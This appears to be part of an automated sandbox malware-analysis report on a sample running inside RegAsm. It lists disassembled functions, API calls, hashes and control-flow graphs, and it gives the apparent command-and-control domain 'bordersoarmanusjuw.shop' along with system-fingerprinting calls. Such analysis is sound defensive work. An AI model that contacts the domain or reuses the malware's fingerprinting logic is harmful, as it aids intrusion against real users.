                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: D1B7$D1B7
                                                                                                                                              • API String ID: 0-2576811906
                                                                                                                                              • Opcode ID: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
                                                                                                                                              • Instruction ID: 227d40b3051d5b9f1c8533b328a387a81ecb6462684d2791c386ca89a2a782a0
                                                                                                                                              • Opcode Fuzzy Hash: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
                                                                                                                                              • Instruction Fuzzy Hash: BE516CB4518301ABD708DF10D9A172FBBE2BBCA708F04992CE48547351E7B88D05EB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00415B57 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 431COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: v
                                                                                                                                              • API String ID: 0-1801730948
                                                                                                                                              • Opcode ID: 233739d0e7ffd3f581b2dd250cda54125e3c87964c33640d052a77960d3d9fd8
                                                                                                                                              • Instruction ID: c80b823732e71f4cdd7a44ad5e5a1a1d83ce3d0079143c9f8b25ab05eee7cb54
                                                                                                                                              • Opcode Fuzzy Hash: 233739d0e7ffd3f581b2dd250cda54125e3c87964c33640d052a77960d3d9fd8
                                                                                                                                              • Instruction Fuzzy Hash: 69E1DFB15083419FD324CF14C48179FBBE2AFD5308F588A6EE4998B392E739D845CB96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00421F80 Relevance: 2.9, Strings: 2, Instructions: 369COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID: A\]D$vSUN
                                                                                                                                              • API String ID: 2994545307-3118794373
                                                                                                                                              • Opcode ID: ec616842d889afad07b2ab96f2a3b507bd2965400d8841d8a2506f832f9cda12
                                                                                                                                              • Instruction ID: 035f47e295922484c15501f127bff06197c6eb06fd4f10a441f5a1a71ebf76b5
                                                                                                                                              • Opcode Fuzzy Hash: ec616842d889afad07b2ab96f2a3b507bd2965400d8841d8a2506f832f9cda12
                                                                                                                                              • Instruction Fuzzy Hash: 58C1EEB1608361AFD710CF18D580B2BB7E1FB99318F54892EE5C497342D3B9D905CB9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004212B0 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: s}$EBC
                                                                                                                                              • API String ID: 0-541026534
                                                                                                                                              • Opcode ID: fb2f0fbeb1042633251d49655d5c2928f3e20c5a302b4eecd125761bc4d1844e
                                                                                                                                              • Instruction ID: d7b96847a59d0831858f5b8d16e64329f0c99a4ad7ef32cd16afe207355252a1
                                                                                                                                              • Opcode Fuzzy Hash: fb2f0fbeb1042633251d49655d5c2928f3e20c5a302b4eecd125761bc4d1844e
                                                                                                                                              • Instruction Fuzzy Hash: AB91A5B06083518BD724CF14D89076BBBF1FF92358F548A1DE4A68B391E378D909CB96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00435ACB Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00435B5D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
                                                                                                                                              • Instruction ID: ed305ee78db003560d5c2f81a7b8d567382a75ce1c99dc0f9374550bddc06ea8
                                                                                                                                              • Opcode Fuzzy Hash: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
                                                                                                                                              • Instruction Fuzzy Hash: 0611E2705083419FE708CF10D46476BFBA1EBC5318F108A1DE8A92B681C379D90ACB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00435B70 Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LdrInitializeThunk.NTDLL(0043A5F6,005C003F,00000006,00120089,?,00000018,gxyz,?,0041518F), ref: 00435B9D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                                                                                                              • Instruction ID: e4f63ef377a97c2914c676668e3278340bf37c640bd7ba7daadddd8153819c93
                                                                                                                                              • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                                                                                                              • Instruction Fuzzy Hash: 26E0B675509606EBDA05DF45C14051FF7E2BFC4714FA5C88DE88463204C7B4BD45DA42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0043AE30 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: gxyz
                                                                                                                                              • API String ID: 0-2474275795
                                                                                                                                              • Opcode ID: 7cd865df7580e3a3251fbc4e571994a29d3f672298f33b1a4ae226595439b4e2
                                                                                                                                              • Instruction ID: e7b234e54a7d762bb6a3bd1b4f03db8f12db98f9d7bb1013814233ca64f7ddf6
                                                                                                                                              • Opcode Fuzzy Hash: 7cd865df7580e3a3251fbc4e571994a29d3f672298f33b1a4ae226595439b4e2
                                                                                                                                              • Instruction Fuzzy Hash: F281CA72A043129BD714CF14C8A0B6BB3A1FF88364F25991EE9955B391D338EC15CB9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0043B800 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID: gxyz
                                                                                                                                              • API String ID: 2994545307-2474275795
                                                                                                                                              • Opcode ID: 19e827949be7d9c90c52f93cbe7905a439d5d0436ab1b3d3fe8e59ff32325d39
                                                                                                                                              • Instruction ID: d5821ae3abbd5b49496d0d32a43c6cb899c31e2747818077e51798368a7f3181
                                                                                                                                              • Opcode Fuzzy Hash: 19e827949be7d9c90c52f93cbe7905a439d5d0436ab1b3d3fe8e59ff32325d39
                                                                                                                                              • Instruction Fuzzy Hash: FB81DD71608302AFD718CF14D890B2BBBA5EF89354F18991DE9958B391D338E945CBC6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00415390 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              • Opcode ID: 10cc4ab24c7f48d7c6fa18d5fa84f84423c8fc5c7e04cbeddc6c84a1160124f3
                                                                                                                                              • Instruction ID: 3d07bc301c4762b4c6ee5a7646427adc52170538d6ac221be9eba05a27c8a57f
                                                                                                                                              • Opcode Fuzzy Hash: 10cc4ab24c7f48d7c6fa18d5fa84f84423c8fc5c7e04cbeddc6c84a1160124f3
                                                                                                                                              • Instruction Fuzzy Hash: AA218E78210A40CFE728CF14D8A0B67B3A2FF8A349F64492DD5C647B91E775B841CB49
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00417239 Relevance: .3, Instructions: 310COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 39a9474f83705d2a35e3a7ed89a71eb199a025ff3331637dbb258dee97e69e13
                                                                                                                                              • Instruction ID: 86805473c38cceb78552a0540260a6a94279074ff3da8f2079f33daa4ad5654a
                                                                                                                                              • Opcode Fuzzy Hash: 39a9474f83705d2a35e3a7ed89a71eb199a025ff3331637dbb258dee97e69e13
                                                                                                                                              • Instruction Fuzzy Hash: D1C141B0510B008BD725CF20C4A46A7BBF2FF85314F545E1DD5A74BAA1D778E54ACB88
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042A936 Relevance: .0, Instructions: 22COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 61828c0bb65060645607b7bcf0ba44af168b99c9bcfbadb5323aba25d4cd7529
                                                                                                                                              • Instruction ID: 235f7b0fceadf091eafc56df715b5c09dc53dff0cccafe78ca5562ce20de9adc
                                                                                                                                              • Opcode Fuzzy Hash: 61828c0bb65060645607b7bcf0ba44af168b99c9bcfbadb5323aba25d4cd7529
                                                                                                                                              • Instruction Fuzzy Hash: 38F0D4B5508381CFD320DF25C94574BBBE5BBC4304F15C92EE88587291D7B9A406CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042A245 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 83memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 6 42a245-42a333 7 42a375-42a3dd SysAllocString 6->7 8 42a335 6->8 11 42a3e7-42a413 7->11 9 42a337-42a371 8->9 9->9 10 42a373 9->10 10->7
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocString
                                                                                                                                              • String ID: !$%$3$6$:$;$D
                                                                                                                                              • API String ID: 2525500382-2591950249
                                                                                                                                              • Opcode ID: 511d7fbf50cccccdc7858a347d8d5263d77f1ec6d27186fb6dd458a649bd9444
                                                                                                                                              • Instruction ID: 963f1b3e5fd6771a7d36494be66c3600f40f07d37cb3ae169d65202430aa07ab
                                                                                                                                              • Opcode Fuzzy Hash: 511d7fbf50cccccdc7858a347d8d5263d77f1ec6d27186fb6dd458a649bd9444
                                                                                                                                              • Instruction Fuzzy Hash: 5941B07010CBC18ED331CB29C89878BBBE1ABD6315F044A5DE4E98B391C779950ACB57
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040DBF0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 403COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 24 40dbf0-40dbfc 25 40dbfe-40dcd2 24->25 26 40db7f-40dbbe call 40a600 call 4359f0 call 40a470 call 435aa0 24->26 27 40dcd4 25->27 28 40dd1b-40ddcd 25->28 52 40dbc3-40dbeb 26->52 30 40dcd6-40dd17 27->30 31 40de0a-40e037 ExitProcess * 4 28->31 32 40ddcf 28->32 30->30 34 40dd19 30->34 36 40e074-40e0c6 31->36 37 40e039 31->37 35 40ddd1-40de06 32->35 34->28 35->35 39 40de08 35->39 41 40e0f2-40e14c call 40b320 36->41 42 40e0c8 36->42 40 40e03b-40e070 37->40 39->31 40->40 46 40e072 40->46 47 40e0ca-40e0ee 42->47 46->36 47->47 50 40e0f0 47->50 50->41
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: 8C$bordersoarmanusjuw.shop
                                                                                                                                              • API String ID: 621844428-3969398216
                                                                                                                                              • Opcode ID: 8dad07c21383834f3d784b1eea64f292f0b2ee3006e30451b3dd8b1a3a3652c0
                                                                                                                                              • Instruction ID: c3754cf6d4af3efd44086515a8e4feea577dce0be4ef3330c692d516742b2779
                                                                                                                                              • Opcode Fuzzy Hash: 8dad07c21383834f3d784b1eea64f292f0b2ee3006e30451b3dd8b1a3a3652c0
                                                                                                                                              • Instruction Fuzzy Hash: A8222860008BC1CED726CF388498716BFA16B26224F1987DDD8E64F7E7C3759509CBA6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040D5D0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 399COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 53 40d5d0-40d5d2 54 40d5d4-40d6df call 4092e0 53->54 55 40d59b-40d59f 53->55 58 40d6e1-40d6e4 54->58 59 40d728-40d7d4 54->59 55->53 62 40d6e6-40d721 58->62 60 40d7d6-40d7d9 59->60 61 40d817-40da4e ExitProcess * 4 59->61 64 40d7db-40d810 60->64 65 40da50-40da52 61->65 66 40da8f-40dae1 61->66 62->62 63 40d723-40d726 62->63 63->59 64->64 67 40d812-40d815 64->67 68 40da54-40da89 65->68 69 40dae3 66->69 70 40db19-40db44 call 40b320 66->70 67->61 68->68 71 40da8b-40da8d 68->71 72 40dae5-40db12 69->72 75 40db49-40db71 70->75 71->66 72->72 74 40db14-40db17 72->74 74->70
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: 8C$bordersoarmanusjuw.shop
                                                                                                                                              • API String ID: 621844428-3969398216
                                                                                                                                              • Opcode ID: 4e885f4b103528a34ba8b05d68ad07885692d717e93b6dc83f6bf867971cc171
                                                                                                                                              • Instruction ID: e062613535a096f7c986de94b394a9a3299ac3684046ad9440d4ee051fa42249
                                                                                                                                              • Opcode Fuzzy Hash: 4e885f4b103528a34ba8b05d68ad07885692d717e93b6dc83f6bf867971cc171
                                                                                                                                              • Instruction Fuzzy Hash: F1220760508BC1CED726CF388498702BFA16B56224F1887DDD8E94F7E7C3799406CBA6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00409240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 425 409240-40925c call 4092e0 call 436fd0 430 409260-409267 call 4321d0 425->430 431 40925e 425->431 435 409269 430->435 436 40926b-40929c GetStdHandle ExitProcess call 40a760 430->436 432 4092ae-4092ba ExitProcess 431->432 437 4092a5-4092ac call 4390c0 435->437 441 4092a0 call 410210 436->441 442 40929e 436->442 437->432 441->437 442->437
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 0040927D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
                                                                                                                                              • API String ID: 621844428-3137510881
                                                                                                                                              • Opcode ID: 59d31c83763740c401a164c8abda1a317b471818f0df02a94b0c3ec7177b1887
                                                                                                                                              • Instruction ID: d46854307137c8737da70bb0dadd48020878a784c1cb78799af495398ee7fa65
                                                                                                                                              • Opcode Fuzzy Hash: 59d31c83763740c401a164c8abda1a317b471818f0df02a94b0c3ec7177b1887
                                                                                                                                              • Instruction Fuzzy Hash: 64F06871418200B7DA003B765A0765A7AA85F51314F11497FEDC1621C3EA7D4C46C66F
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0043890C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 606 43890c-43891a 607 438921-43892f call 4359f0 606->607 608 43891c-43891f 606->608 611 43896d-43897c 607->611 608->607 612 438983-4389c2 611->612 613 43897e-438981 611->613 614 438940-43896a RtlAllocateHeap 612->614 615 4389c8 612->615 613->612 614->611 616 4389d0-438a08 615->616 616->616 617 438a0a 616->617 617->614
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 0043894D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID: &QPS$+D
                                                                                                                                              • API String ID: 1279760036-1945338363
                                                                                                                                              • Opcode ID: 5a221c8c8d48a07bc67a1f36921e72f54b3f0ffb03ca822637087d99e5969acd
                                                                                                                                              • Instruction ID: 459049e7f1910dfcb695529ac4e7c087eddce05ed813d227b7292beb86339d8b
                                                                                                                                              • Opcode Fuzzy Hash: 5a221c8c8d48a07bc67a1f36921e72f54b3f0ffb03ca822637087d99e5969acd
                                                                                                                                              • Instruction Fuzzy Hash: 8C210CB4608340AFD748CF14D8A072BB7A2FB85324F649A2DE96647691CB399851CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004340A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 618 4340a8-4340ff call 439a30 GetVolumeInformationW
                                                                                                                                              APIs
                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004340E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InformationVolume
                                                                                                                                              • String ID: C$\
                                                                                                                                              • API String ID: 2039140958-514332402
                                                                                                                                              • Opcode ID: 1f089596534fe024055dce1adbee186e85238b9520941c24a8e10a22622ed5ef
                                                                                                                                              • Instruction ID: 0b16e51853d0470085fd2b4e6c78b332ddd4def9cb37a61542a3d6919008bdae
                                                                                                                                              • Opcode Fuzzy Hash: 1f089596534fe024055dce1adbee186e85238b9520941c24a8e10a22622ed5ef
                                                                                                                                              • Instruction Fuzzy Hash: DFE09275350741BBE728DF10EC27F1A3690D742744F10042CB242E91D0C7F57D108A5D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004261A1 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 440COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: !/$*
                                                                                                                                              • API String ID: 0-545799914
                                                                                                                                              • Opcode ID: ba954ffb2ea977e785fb344dc988f3a74d89b07fdf3ede9a299b4b895ee98fb9
                                                                                                                                              • Instruction ID: b2e27cbc9dde12e33a9927742966e6e389a792aa4b3f0ff258c4c825271f69ae
                                                                                                                                              • Opcode Fuzzy Hash: ba954ffb2ea977e785fb344dc988f3a74d89b07fdf3ede9a299b4b895ee98fb9
                                                                                                                                              • Instruction Fuzzy Hash: C4F13870205B918EE7268F35D4A47E3BBE1BF17304F84499DD4EB8B282C77AA405CB55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004265CC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 373COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004266FC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                              • String ID: !/$*
                                                                                                                                              • API String ID: 3960555810-545799914
                                                                                                                                              • Opcode ID: e16e771a1d8e5cca60c9eee4cf03313e5d8a22d2944b828cb098f366c51c4bae
                                                                                                                                              • Instruction ID: 466006afd69678fcb0a440aae3b801bbbbe4bedcac6f7be2defe912c2a8870dc
                                                                                                                                              • Opcode Fuzzy Hash: e16e771a1d8e5cca60c9eee4cf03313e5d8a22d2944b828cb098f366c51c4bae
                                                                                                                                              • Instruction Fuzzy Hash: 1DD137B0205B918EE7258F35D4A47E3BBE1BF17304F84496DD4EB8B282C77AA405CB55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004383AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID: D1B7
                                                                                                                                              • API String ID: 1029625771-1785272153
                                                                                                                                              • Opcode ID: ba243289e261731e0f328ab571701020da0383182d802b1ebf38187e4b27abb8
                                                                                                                                              • Instruction ID: bda3516896a5f2ae45156be42eb04b2df876cef8185d1ab8fdc58d2902e9d8c2
                                                                                                                                              • Opcode Fuzzy Hash: ba243289e261731e0f328ab571701020da0383182d802b1ebf38187e4b27abb8
                                                                                                                                              • Instruction Fuzzy Hash: 722171B4518301ABD708DF10D9A171FBBE2FBCA708F14992CE48547351E7748D05DB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004359F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,00409E11), ref: 00435A87
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID: &QPS
                                                                                                                                              • API String ID: 1279760036-2176464483
                                                                                                                                              • Opcode ID: 69127a2621d4f876e4ea6e0d4522e800ef0ce33a1218fea6c99b8e6b414e8f95
                                                                                                                                              • Instruction ID: 3531a23c288a52d53f944b2c3e457840114f3fd3f8c40cca6c01df16574b446f
                                                                                                                                              • Opcode Fuzzy Hash: 69127a2621d4f876e4ea6e0d4522e800ef0ce33a1218fea6c99b8e6b414e8f95
                                                                                                                                              • Instruction Fuzzy Hash: B9114570108341AFD708CF04D8A0B6FBBE2FB85328F248A1DE8A507681C739D9199BC6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042E6AB Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
